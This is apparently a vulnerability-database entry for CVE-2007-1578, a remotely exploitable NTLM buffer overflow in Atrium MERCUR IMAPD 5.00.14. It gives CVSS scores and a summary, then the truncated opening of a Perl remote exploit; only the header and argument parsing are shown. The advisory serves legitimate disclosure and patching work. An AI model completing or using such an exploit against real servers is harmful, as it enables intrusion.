10
CVSSv2

CVE-2007-1578

Published: 21/03/2007 Updated: 11/10/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote malicious users to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.

Vulnerable Product Search on Vulmon Subscribe to Product

atrium software mercur imapd 5.00.14

Exploits

#!/usr/bin/perl # # mercur-v1pl # # Mercur v50014 (win32) remote exploit # by mu-b - Dec 2006 # # - Tested on: Mercur v50014 (win32) # ######## use Getopt::Std; getopts('t:n:', \%arg); use Socket; use MIME::Base64; &print_header; my $target; if (defined($arg{'t'})) { $target = $arg{'t'} } if (!(defined($target))) { &usage; } my $i ...